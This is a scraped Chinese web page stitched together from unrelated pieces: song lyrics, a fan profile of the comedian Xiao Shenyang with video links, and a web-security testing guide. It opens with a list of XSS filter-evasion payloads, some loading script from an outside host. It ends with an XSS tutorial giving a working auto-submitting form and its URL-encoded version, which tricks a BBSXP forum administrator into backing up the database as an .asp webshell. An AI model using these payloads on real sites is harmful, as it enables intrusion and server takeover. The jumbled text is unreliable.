expression(alert('XSS'));" IMG SRC=javascript:ale STYLE@im\port'\ja\vasc\ript:alert("XSS")';/STYLE IMG STYLE='xss:expre\ssion(alert("XSS"))' STYLE TYPE="text/javascrīpt"alert('XSS');/STYLE STYLE type="text/css"BODY{background:url("javascrīpt:alert('XSS')")}/STYLE BASE HREF="javascrīpt:alert('XSS');//" getURL("javascrīpt:alert('XSS')") a="get";b="URL";c="javascrīpt:";d="alert('XSS');";eval(a+b+c+d); XML SRC="javascrīpt:alert('XSS');" " BODY ōNLOAD="a();"scrīptfunction a(){alert('XSS');}/scrīpt" scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"/scrīpt IMG SRC="javascrīpt:alert('XSS')" IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" scrīpt a="" SRC="http://xss.ha.ckers.org/a.js"/scrīpt scrīpt ="" SRC="http://xss.ha.ckers.org/a.js"/scrīpt scrīpt a="" '' SRC="http://xss.ha.ckers.org/a.js"/scrīpt scrīpt "a=''" SRC="http://xss.ha.ckers.org/a.js"/scrīpt scrīptdocument.write("SCRI");/scrīptPT SRC="http://xss.ha.ckers.org/a.js"/scrīpt A HREF=http://www.gohttp://www.google.com/ogle.com/link/A STYLE TYPE="text/css".XSS{background-image:url("javascrīpt:alert('XSS')");}/STYLEA CLASS=XSS !--#exec cmd="/bin/echo 'scrīpt SRC'"--!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js/scrīp 最后,当用户浏览 时便会弹出一个警告框,内容显示的是浏览者当前的 cookie 串,这就 说明该网站存在 XSS 漏洞。 试想如果我们注入的不是以上这个简单的测试代码,而是一段经常精心设计的恶意脚 本,当用户浏览此帖时,cookie 信息就可能成功的被 攻击者获取。此时浏览者的帐号 就很容易被攻击者掌控了。 (2)如何预防 XSS 漏洞? 从应用程序的角度来讲,要进行以下几项预防: 对 Javascrīpt,VB scrīpt, HTML,ActiveX, Flash 等 语句或脚本进行转义. 在 服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感 字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端 拒绝进行关 键性的处理操作. 从测试人员的角度来讲,要从需求检查和执行测试过程两个阶段来完成 XSS 检查: 在需求检查过程中对各输入项或输出项进行类型、长度以及取 值范围进 行验证,着重验证是否对 HTML 或脚本代码进行了转义。 执行测试过程中也应对上述项进行检查。 3.CSRF:(跨站点伪造请求) 3.CSRF:(跨站点伪造请求) CSRF:(跨站点伪造请求 CSRF 尽管听起来像跨站脚本(XSS),但它与 XSS 非常不同,并且攻击方式 几乎相左。 XSS 是利用站点内的信任用户,而 CSRF 则通过伪装来自受信任用户的请求 来利用受信任的网站。 XSS 也好, CSRF 也好, 它的目的在于窃取用户的信息, SESSION 和 COOKIES 如 (关于 SESSION 和 COOKIES 的介绍请参见我的另一篇 BLOG: http://www.51testing.com/?49689/action_viewspace_itemid_74885.html), (1)如何进行 CSRF 测试? 关于这个主题本人也正在研究,目前主要通过安全性测试工具来进行检查。 (2)如何预防 CSRF 漏洞? 请参见 http://www.hanguofeng.cn/archives/security/preventing-csrf 请 参见 http://getahead.org/blog/joe/2007/01/01/csrf_attacks_or_how_to_ avoid_exposing_your_gmail_contacts.html Injection(邮件标头注入 邮件标头注入) 4.Email Header Injection(邮件标头注入) Email Header Injection:如果表单用于发送 email,表单中可能包括 “subject”输入项(邮件标题),我们要验证 subject 中应能 escape 掉“\n” 标识。 !--[if !supportLists]--!--[endif]--因为“\n”是新行,如果在 subject 中输入“hello\ncc:spamvictim@example.com”,可能会形成以 下 Subject: hello cc: spamvictim@example.com !--[if !supportLists]--!--[endif]--如果允许用户使用这样的 其它用 subject, 那他可能会给利用这个缺陷通过我们的平台给其它 户发送垃 其它 圾邮件。 Traversal(目录遍历 目录遍历) 5.Directory Traversal(目录遍历) (1)如何进行目录遍历测试? 目录遍历产生的原因是:程序中没有过滤用户输入的“../”和“./”之 类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的 任意文件。 测试方法: URL 中输入一定数量的 在 “../” “./” 验证系统是否 ESCAPE 和 , 掉了这些目录跳转符。 (2)如何预防目录遍历? 限制 Web 应用在服务器上的运行 进 行严格的输入验证,控制用户输入非法路径 messages(错误信息 错误信息) 6.exposed error messages(错误信息) (1)如何进行测试? 首 先找到一些错误页面,比如 404,或 500 页面。 验证在调试未开通过的情况下, 是否给出了友好的错误提示信息比如“你 访问的页面不存 在”等,而并非曝露一些程序代码。 (2)如何预防? 测试人员在进行需求检查时,应该对出错信息 进行详细查,比如是否给 出了出错信息,是否给出了正确的出错信息。

啊咿呀咿呀咿呀 是什么歌的歌词啊?

butterfly,是这首歌吗?比较古老一点。。下面附上歌名、歌词

歌名《butterfly》就是著名的舞曲蝴蝶舞

歌手:smile

专辑:best99

ay,iyaiyai

ay,iyaiyai

ay,iyaiyai

where's

my

samural?

i've

been

searching

for

a

man

allacross

japan

just

to

find,to

find

my

samural

someone

who

is

strong

but

still

a

little

shy

yes

i

need,i

need

my

samural

ay,ay,ay

i'm

your

little

butterfly

green,black

and

blue

make

the

colours

of

the

sky

ay,ay,ay

i'm

your

little

butterfly

green,black

and

blue

make

the

colours

of

the

sky

i've

been

searching

in

the

woods

and

high

upon

the

hills

just

to

find,to

find

my

samural

someone

who

won't

regret

to

keep

me

his

net

yes

i

need,i

need

my

samural

小沈阳的资料

[编辑本段]个人信息

艺名:小沈阳

原名:沈鹤

曾用名:沈阳

花名:阳仔

英文名:XIAO Shenyang(小sun样儿)

性别:男

出生年月:1981年5月7日(阴历四月初四)

星座:金牛座

年龄:28岁

生肖:鸡

籍贯:辽宁省 铁岭市 开原市

妻子和子女:沈春阳(即小沈阳的搭档,25岁)有一女儿(4岁)

身高:174cm左右

体重:约60公斤

职业:艺术家/演员

血型:AB型

毕业学校:辽宁省开原市上肥地乡代庄小学

人生格言:走别人的路,让别人无路可走

座右铭:

不要只想要,付出不能少。 不要急着要,一定要戒躁。

不要求回报,该到自然到。 不要急得到,心静便无恼。

说话要想好,办事要公道。 说到要做到,不要瞎编造。

做人要地道,才能步步高。 走就走正道,好人有好报。

体型:很好

星座:金牛座

性格:浪漫迷人、成熟稳重、风趣幽默、活泼可爱、开朗大方、感情专一、善解人意、诚实坦白

口头禅:为什么呢? 啪啪的!……hang~ 哎呀我的妈呀

偶像:成吉思汗

喜欢的活动:民间艺术、唱K、看电影、游戏对战

喜欢的食物:素食

喜欢的歌星:孙楠 刀郎 (赵本山说“屎壳郎”)许巍

喜欢的电影:冯小刚拍摄的电影

个人介绍:山不转水转,水不转人转,风风火火二人转,转不出的缘里缘外,转不完的缘系缘牵,我就是“为戏痴迷 为歌疯狂”小沈阳是也。

师父:赵本山

所从事的行业:影视/娱乐/体育

嗜好:吸烟、喝酒

[编辑本段]生平简介

小沈阳,深受广大二人转爱好者的欢迎。

他男扮女装的另类二人转表演在刘老根大舞台引起了不小的轰动。

沈鹤出生于开原市一个贫苦的农民家庭,艰苦的家庭条件并没有阻挡他对艺术的向往,反而成为了他受益终身的财富。上学期间他就积极参加学校、县里组织的各项文艺活动,老师常表扬有超众的艺术天分。

高中毕业以后,进入铁岭县艺术团学习二人转表演。老师系统的教导、良好的艺术天赋再加上自身的不断努力为他的演艺生涯打下了坚实的基础。在铁岭县艺术团期间,他积极地参加下乡演出,在田间地头与观众面对面的交流使他深刻地感受到老百姓对二人转的喜爱,也更加坚定了他将二人转艺术作为一生的追求。

2000年他进入吉林林越艺术团,扎实的基本功、诙谐的表演方式使其深受观众的欢迎和好评,观众的认可无疑是他最大的动力,促使他以更高的艺术标准来要求自己。2001年,参加第一届“本山杯”二人转大赛获得了铜奖,对于一个学习二人转只有4年的新人来说,这个奖项是对他多年来的付出的一个肯定。

19岁时和老婆沈春阳恋爱,当时把自己的经济交给夫人管理,虽然钱包里每次不超过100,一次演出的出场费也才40、50元。但是对于老婆的爱一尘不变。

2006年阴历八月十五,他正式成为赵本山的弟子,开始系统的学习二人转。通过老师的悉心指导工作和自身的刻苦努力,在艺术的道路上有了质的飞跃,辽宁民间艺术团的广阔平台也给了他充分展示自己的机会。

他在以“刘老根大舞台”为基地的舞台上辛勤耕耘,为弘扬绿色二人转贡献出了自己的力量。 在2008年春节晚会筹备期间,就有小沈阳登台演出的消息广泛传播。虽然当年没有登上08春晚舞台,但网络上小沈阳演出视频非常火爆。在《乡村爱情》1、2中也有角色扮演,深受大家喜欢。

随后在2009年中央电视台春节联欢晚会中与师傅赵本山搭档演出小品后,受到更多人的喜爱。

[编辑本段]拜师经历

小沈阳在哈尔滨唱二人转那会儿,就跟现在的师兄弟都认识了,他们经常跟赵本山提起小沈阳,说他唱得不错。2006年5月的一个夜里,小沈阳接到一个电话,那人一直不出声,就是呵呵地在电话里笑。小沈阳有点不敢相信,冒昧问“哎呀妈呀,难道是赵老师?”对方一句“怎么地?”小沈阳蒙了,激动得有些“麻爪”。当时赵老师说,“听说你唱得挺好,就来沈阳发展吧!”。

可拜师也不那么容易,赵本山亲自在当时的铁西和平影剧院给小沈阳考试。考试通过后,2006年的中秋节,小沈阳正式拜师,拜师时,师父跟小沈阳说的唯一的一句话就是,“好好干,犯错误收拾你”。

[编辑本段]电视剧作品

《乡村爱情Ⅱ》扮演齐三太镇长夫人的侄子王天来。

《关东大先生》中扮演“小奉天”。

[编辑本段]从艺经历

2009春晚小品《不差钱》小沈阳剧照1995年至1998年在铁岭学习二人转表演

1999年正式演出

2000年参加首届本山杯二人转大赛 获铜奖

2006年参加刘老根大舞台二人转大赛 获季冠军

2006年阴历八月十五被赵本山收为徒弟,他男扮女装的另类二人转表演在刘老根大舞台引起了不小的轰动。

2007年12月初次登陆央视舞台,在电视剧群英汇晚会中表演了《我要当明星》片段,获得满堂彩。

2008年1月有机会参加央视春晚的审查,送选节目《我要当明星》,惟妙惟肖地模仿了刀郎、刘德华、张雨生、阿杜、阿宝的演唱,震惊四座。最终被评价为与春晚主题不够相符未能与全国人民在大年夜开心笑一回。

2008年2月20日再次应央视春晚导演邀请参加元宵晚会的录制,表演《我要当明星》,再次震惊四座,但在2月21日正式播放时因节目时间过长未播出。

2009年1月24日终于参选春节联欢晚会,和老师赵本山同台表演小品《不差钱》,获得全国观众高声叫好,从而一炮走红,身价从2006年的500元瞬间飙升至30—50万元。

2009年1月25日参加北京电视台春节联欢晚会,表演小品《超级大明星》,表演的惟妙惟肖。小沈阳北京春晚

[编辑本段]小沈阳作品集合

搞笑类:

“烤肉串”+早期作品大全: http://v.ku6.com/special/index_2417121.html

北票演出:http://v.ku6.com/show/SJGTBL9ms7Jn_iXW.html

中国足球:http://www.ku6.com/special/index_2216653.html

东方斯卡拉:http://www.ku6.com/special/index_2216629.html

大话西游:http://www.ku6.com/special/index_2216562.html

公安部慰问演出:http://www.ku6.com/special/index_2216546.html

刘老根大舞台:http://www.ku6.com/special/index_2216538.html

刘老根大舞台冠军:http://www.ku6.com/special/index_2216532.html

天津电视台:http://www.ku6.com/special/index_2216528.html

元宵未播出:http://www.ku6.com/special/index_2216522.html

笑动2008 :http://www.ku6.com/special/index_2216501.html

参加春晚审查:http://www.ku6.com/special/index_2216589.html

辽宁台小品求婚:http://www.ku6.com/special/index_2216585.html

与赵本山合演小品《不差钱》

搞笑秀:http://www.ku6.com/special/index_2216583.html

笑话上坟:http://www.ku6.com/special/index_2216580.html

和四舅妈:http://www.ku6.com/special/index_2216579.html

笑在新春:http://www.ku6.com/special/index_2216570.html

不差钱:http://video.baidu.com/v?word=%D0%A1%C9%F2%D1%F4%20%B2%BB%B2%EE%C7%AEct=301989888rn=20pn=0db=0s=0ty=10

唱歌类:

把泪擦干http://v.ku6.com/show/ijCyeUkZrKwZp95C.html

回家真好: http://v.ku6.com/show/3t8m8qDheXj7AyvU.html

囚歌 :http://v.ku6.com/show/5-lUhZqqTBGoD8_B.html

小沈阳练习:http://www.ku6.com/special/index_2216627.html

模仿刀郎:http://www.ku6.com/special/index_2216625.html

模仿张宇:http://www.ku6.com/special/index_2216622.html

模仿冰雨:http://www.ku6.com/special/index_2216617.html

后台排练:http://www.ku6.com/special/index_2216615.html

春晚彩排:http://www.ku6.com/special/index_2216600.html

搞笑唱歌:http://www.ku6.com/special/index_2216514.html

千里之外:http://www.ku6.com/special/index_2216568.html

访谈类:

小沈阳给天健网友拜年 :http://www.ku6.com/show/cEFPXbzSlv9Flbri.html

元宵被毙:http://www.ku6.com/special/index_2216566.html

辽宁晚报采访:http://www.ku6.com/special/index_2216542.html

唱二人转被哄下场:http://www.ku6.com/special/index_2216517.html

春晚“被毙”感受:http://www.ku6.com/special/index_2216598.html

谈赵本山收徒标准:http://www.ku6.com/special/index_2216591.html

赞东北:http://www.ku6.com/special/index_2216576.html

星播客拜年:http://www.ku6.com/special/index_2216569.html

正戏类:

闪闪的红星:http://v.ku6.com/show/9F30HjjHUnzVXYZb.html

正戏:http://v.ku6.com/special/show_2152588/_ekFqbts54U-g13W.html

小帽《双回门》:http://v.ku6.com/show/3O7XL-9FYUs7YIcq.html

江南寡妇:http://www.ku6.com/special/index_2216671.html

刘三姐上寿:http://www.ku6.com/special/index_2216661.html

包公铡侄:http://www.ku6.com/special/index_2216648.html

汉琦杀庙:http://www.ku6.com/special/index_2216643.html

包公断太公:http://www.ku6.com/special/index_2216603.html

电视剧类:

乡村爱情2小沈阳演出片段集锦:http://v.ku6.com/special/index_2152588.html

乡村爱情2(完整版41集全):http://www.ku6.com/special/index_2156500.html

乡村爱情2首映演唱:http://www.ku6.com/special/index_2216595.html

其他类:

电子相册: 1、分解板:地址:http://v.ku6.com/special/index_2399611.html

2、完整版+动画版:http://v.ku6.com/show/XSsavGif1L_jKiqG.html

3、至尊玉动画版:http://v.ku6.com/show/4E_uROe-41EmUUfB.html

4、小沈阳写真 (完整版+漫画版).mp4 http://www.mediafire.com/?wmzccedvglx

小沈阳“五一乐翻天”电子相册:http://v.ku6.com/show/sinn1bokeKQ6k3G1.html

[编辑本段]个人博客

http://xiaoshenyangvip.blog.sohu.com/

http://blog.sina.com.cn/xiaoshenyang2008

小沈阳官方网站 沈采飞阳(歌迷网)

http://92xsy.com/index.php

[编辑本段]经典台词

1 这是为什么呢

2 走别人的路,让别人无路可走

3 我太有才了,上辈子我是裁缝

4 都说我长得寒碜,不过我妈挺稀罕我,我妈说小时候带我去公园,老多人围着问 我妈, “大姐,你家这猴搁哪买的?” 现在我都长开了。

5 出名了仍要慢慢发展看看我穿的这身衣服,啥,你说我这大红配大绿不好看,别瞧不起人,我的衣服都是从专卖店买的。

6 我在商场逛,随便问一个服务员,你卖这衣服多少钱?她说,180元。我说,30元卖不?她说卖,然后就让我交钱,我说,我不买,就是随便溜达。

7 太阳出来东方亮 山炮啥样我啥样

8 多喜庆啊

9 ——我看你长得好年轻哦 这化妆品好厉害哦 眼瞅着都六十的人了 谁能看出来了

——谁六十啊 人家一朵花没开呢

——是啊 仙人掌嘛 六十年一开花

10 pia pia 我就溜达,我可顽皮了呢!!

11 眼睛一闭一睁一天儿过去了hou~,眼睛一闭不睁,一辈子过去了hou!

12 我到家了,你们还追啊!!

13 不用拍,到我的班就是休息!

14 我看谁没鼓掌,半夜趴你家窗户~~

15 我的中文名叫小沈阳,我的英文名叫xiao shen yang ~~~~~!

16 老妹儿,你能抓着我啊~~

17 咿~~穿跑偏了,哎呀妈呀,我说走道咋没有裆nia。

18 我是有身份的人,什么是有身份的人呢?就是有身份证的人就是有身份的人!

19 太阳出来照大地!欢迎大伙来看戏

20 诶呀妈呀,我可稀罕我这个小包了。320……打完折15

21 我自己能做到的事,从来不麻烦别人

22 我走死你~~~~

23 观众朋友们吖~~他们都说我长地像变态~!告诉你们,其实我可正常咧~!!!!

24 放你个五彩玲珑月光电缆屁!

25 趴趴地就溜达,谁叫我也不回头。

26 到我班儿了嚎,大伙儿不用老鼓掌.你们的手腕子一疼.我的心都疼.

27 你瞎啊!!!我这是棉花套只!!!!

28 哎呀我说别人跑你不跑是吧...你藐视我是吧! 我说你咋不蹽呐~~我来啦....

29 来哥啊?我小唐,恩那~到女儿国了~老狠了~扇嘴巴子~

想开心看二人转,想闹心就看一下足球,想往死了闹心就看一下中国足球

30 人不可貌相`海水不可瓢崴

31 给朋友们来个另类点的 台湾著名歌星陈水扁的歌送给大家

美国著名摇滚电视剧连续剧水浒传的主题歌护花使者的片头曲刀郎的情人献给大家

32 朋友们呐.他们都说柞瞅我长的磕碜.其实我一点也不磕碜.不信你细瞅.......还赶不上柞瞅呢哈

33 我不是名人 就是一人名

34 这跟头 我练七八年~

35 -玉帝哥哥

-爱 八戒

-玉帝哥哥你是从哪里来啊!

-伊拉克!

-太他妈远了吧~

-远了,那平房!

-没打着 没打着 你妈屁股长白毛!

-我要的是真经

-你妈的我这也不是水货啊!

36 就那伊拉克 你说国家都快黄了

37 -你瞅你长这么难看还出来溜达,在家呆着呗

-就光看你 都撞树上了

38 感谢你们鸦雀无声~

39 我虽然不是名人朋友们,但是像我们周边这些国家,像马来西亚、泰国、越南、新加坡,还有俄罗斯哈----------------我都没去过~

40 别看我长得变态 其实我老有才了

41 这种感觉就是上气不接下气 ...啊吗...上就要短气

42 阿姨阿姨夫你们好~

43(模仿阿杜)你听见了么? 呃~我还没唱呢~

44 老妹你别害怕 我是人 不是鬼阿~

45 呸 臭不要脸的~

46 我给你讲我就穿我这身休闲~

47 你说我是男是女袄 这个问题给我也整矛盾了~

48 奶奶 你真不去袄 那太好了 ~

49 奶奶 我不是玩意

50 哥,你回来了?sit down please!

51太阳出来照大地!欢迎大伙来看戏!要问我是哪一个,人送外号小巩俐!

52 矿泉水喽~茶蛋香肠烤鱼片儿喽~

53 小沈阳说他做飞机空姐就这么喊

54 就是,有一种大海地感觉呢。。。

55 亩嘛呀(这个读法读起来真像,感谢发明者),吃饭还能伤银呐?

56 Q7地,开不起我还背不起么!

57 你咋害不撩尼?你藐视我是不?我来了。。。

58 姐,姐你猜我这小包夺钱你猜,320你信不,打完则15,嗯,老便宜了。

59 哥啊 你就是我亲爹

60 出来吧四舅妈 ,那我叫你啥呢老婶 !

61 就溜达piapia地,谁招我我也不回头,就溜达。

62 老妹儿你能抓住我呀!

63 老妹年啥时候来的啊,咋不给我打电话呢?

64 孩子,你先睡吧。谁把我名抠错了我出来改改”

66 哎呀我去,这不老萨吗,这不兰奇吗

67 ——哎呀嘛哥,你是不是唱二人转那小子,你叫小沈阳啊?

——是怎么地?

——哎呀妈呀,你瞅你长得哈,有一种大海的感觉呢

——小妹儿你是不是喜欢我呢,是不是爱上我了呢?

——哥吖,你别误会,我晕船,我一看到大海吧,我就想吐。

68 什么姑娘,人家是纯爷们

69 人生最痛苦的事情是,人死了,钱没花了~~~~~!

70 毕老师,你给我照个相呗~~

71 有,还是没有啊?

72 哎呀妈呀

73 你是?白岩松?不对!朱军?!等等我想想

老毕!哎呀妈呀!你是毕老师不?

妈呀你咋出来了哪?来人啊!毕老师跑出来了!来人啊~别一会儿跑了~

74 四舅妈:就我最欣赏你咧~你长得太创意了~跟车祸现场似的~~这半辈子就含着眼泪过die~下辈子我一定要找一个骑着白马的王子。

小沈阳:骑着白马的不一定是王子,唐僧有时也骑白马。

四舅妈:唐僧也比你强。

小沈阳:是,能过就过,不能过就吃肉~还能长生不老、。

75 老毕:你多大啦?~

小沈阳:免贵28.

76 哎呀妈呀 老牛B了

77.你说这玩意儿整的~

78,这个..真没有..

79我的搭档并不好看,跟别的女孩不同,因为他是混血儿,他妈是沈阳的,他爸是天津的~

wireshark抓的视频流如何还原成视频

http://wenku.baidu.com/link?url=a3_evLkDYTcYPefou69bBUMqmxsscHj8aOKEUH0nbc2zxkgH6Y663uZ5WiJ7vJyQ4zxKkqc3eH74ZviyvdxQ9T7flogpmUKtgGstD8M8DF3

这个链接里面。

什么是XSS攻击

什么是XSS攻击XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术,但是其思路希望对大家有帮助。 [编辑本段]如何寻找XSS漏洞就个人而言,我把XSS攻击分成两类,一类是来自内部的攻击,主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。

然后利用下面的技术得到一个shell. [编辑本段]如何利用传统的跨站利用方式一般都是攻击者先构造一个跨站网页,然后在另一空间里放一个收集cookie的页面,接着结合其它技术让用户打开跨站页面以盗取用户的cookie,以便进一步的攻击。个人认为这种方式太过于落后,对于弊端大家可能都知道,因为即便你收集到了cookie你也未必能进一步渗透进去,多数的cookie里面的密码都是经过加密的,如果想要cookie欺骗的话,同样也要受到其它的条件的限约。而本文提出的另一种思路,则从一定程度上解决上述的问题。对于个人而言,比较成熟的方法是通过跨站构造一个表单,表单的内容则为利用程序的备份功能或者加管理员等功能得到一个高权限。下面我将详细的介绍这种技术。 [编辑本段]来自内部的跨站攻击寻找跨站漏洞

如果有代码的话比较好办,我们主要看代码里对用户输入的地方和变量有没有做长度和对”〈”,”〉”,”;”,”’”等字符是否做过滤。还有要注意的是对于标签的闭合,像测试QQ群跨站漏洞的时候,你在标题处输入〈script〉alert(‘test’)〈/script〉,代码是不会被执行的,因为在源代码里,有其它的标签未闭合,如少了一个〈/script〉,这个时候,你只要闭合一个〈/script〉,代码就会执行,如:你在标题处输入〈/script〉〈script〉alert(‘test’)〈/script〉,这样就可以弹出一个test的框。

如何利用

我先以BBSXP为例,过程已做成动画,详情可见光盘中的动画。我举BBSXP中其中两个比较好用的跨站漏洞点为例.

a.先注册一个普通用户,我这里注册的用户是linzi.然后我们在个人签名里写入:

c.然后发个贴子,可以结合其它技术欺骗管理员浏览发的贴子。

d.因为是测试,所以我们以管理员身份登陆,然后打开贴子,我们会发现,linzi已经变成了社区区长工,如图一所示

除此之外我们只要在个人签名里输入

同样发个贴子等,只要管理员打开了,就会加了一个扩展名为asp (有空格)的上传扩展,这个时候,你只要上传一个newmm.asp (有空格)就可以得到一个shell.

上面的攻击多多少少有点局限性,虽然可以得到shell,但是隐蔽性不太好,因为签名

处受到了长度的限制,不能超过255个字符。我们可以结合flash跨站实现更为隐蔽的

攻击,对于flash木马的制作,下面见哥们丰初的介绍。

再利用如下:

修改一下个人头像的url,输入代码如下:

再接着欺骗管理员打开你的资料或者浏览你的贴子,当管理员打开后,会在后台自动加个php扩展名的后辍,因为bbsxp在个人头像url里过滤了空格,%,所以我们只能加个不包括空格的其它扩展,当然你也可以加个shtml的扩展,有了它你就可以用来查看源代码,然后进一步攻击。 [编辑本段]来自外部的跨站攻击有的时候,当我们对于目标程序找不到可以利用的跨站点,这个时候我们可以利用可以从外部入手,利用我们要拿下的是它的论坛,论坛的安全性做的很好,但其留言板却存在跨站漏洞,这个时候我们可以在留言板里写入跨站语句,跨站语句为以表单的方式向论坛提交提升权限的语句,如上面的bbsxp加asp 扩展的语句。当然我们可利用后台的备份功能直接得到一个shell。

例:先上传一个文件linzi.txt,内容如下:

〈body onload="javascript:document.forms[0].submit()"〉〈form

action=" http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"〉〈input value="database/bbsxp.mdb" name="yl" 〉〈input value="database/shit.asp" name="bf" 〉〈/body〉〈/html〉

上面的代码是把论坛的数据库备份为shit.asp,留言板存在跨站点如下:

http://127.0.0.1/bbsxp/page2.asp?username=

我们构造备份跨站语句如下:

http://127.0.0.1/bbsxp/page2.asp?username=%3C%62%6F%64%79%20%6F%6E%6C%6F%61%64%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%66%6F%72%6D%73%5B%30%5D%2E%73%75%62%6D%69%74%28%29%22%3E%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%2F%62%62%73%78%70%2F%61%64%6D%69%6E%5F%66%73%6F%2E%61%73%70%3F%6D%65%6E%75%3D%62%61%6B%62%66%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%62%62%73%78%70%2E%6D%64%62%22%20%6E%61%6D%65%3D%22%79%6C%22%20%3E%3C%69%6E%70%75%74%20%76%61%6C%75%65%3D%22%64%61%74%61%62%61%73%65%2F%73%68%69%74%2E%61%73%70%22%20%6E%61%6D%65%3D%22%62%66%22%20%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E

或者构造跨站语句,利用iframe打开一个0大小的linzi.txt。

当管理员打开后,会自动备份得到一个shell. [编辑本段]XSS与其它技术的结合从上面的实例,我们可以知道,如何欺骗管理打开是一个很重要的步骤,对于欺骗打开,除了社会工程学外,我们可以结合其它的技术,如sql injection.当我们渗透一个网站之时,主站mssql注入漏洞,权限为public,这个时候我们利用update构造跨站语句,如用iframe打开一个上面的备份得到shell的跨站语句等,同样,我们可以在社会工程学时,利用QQ的其它跨站漏洞等等。

总是对于欺骗也是一门艺术,具体怎么利用,大家就发挥自己的想象力吧!

好一个欺骗也是一门艺术,不管是在生活中还是在网络中。生活中难免有些事情不能讲真话,这时采用适当的方法使得我们的假话当作真话讲,这就靠欺骗的艺术了。

关键词: 69xss..com
我来说两句
黑客技术 3年前 (2022-05-29) | 回复
ttp://v.ku6.com/show/SJGTBL9ms7Jn_iXW.html中国足球:http://www.ku6.com/special/index_2216653.html东方斯卡拉:http://www.ku6.com/special/index_2216629.html大话西
黑客技术 3年前 (2022-05-29) | 回复
D%22%62%66%22%20%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E或者构造跨站语句,利用iframe打开一个0大小的linzi.txt。 当管理员打开后,会
黑客技术 3年前 (2022-05-29) | 回复
断太公:http://www.ku6.com/special/index_2216603.html电视剧类:乡村爱情2小沈阳演出片段集锦:http://v.ku6.com/special/index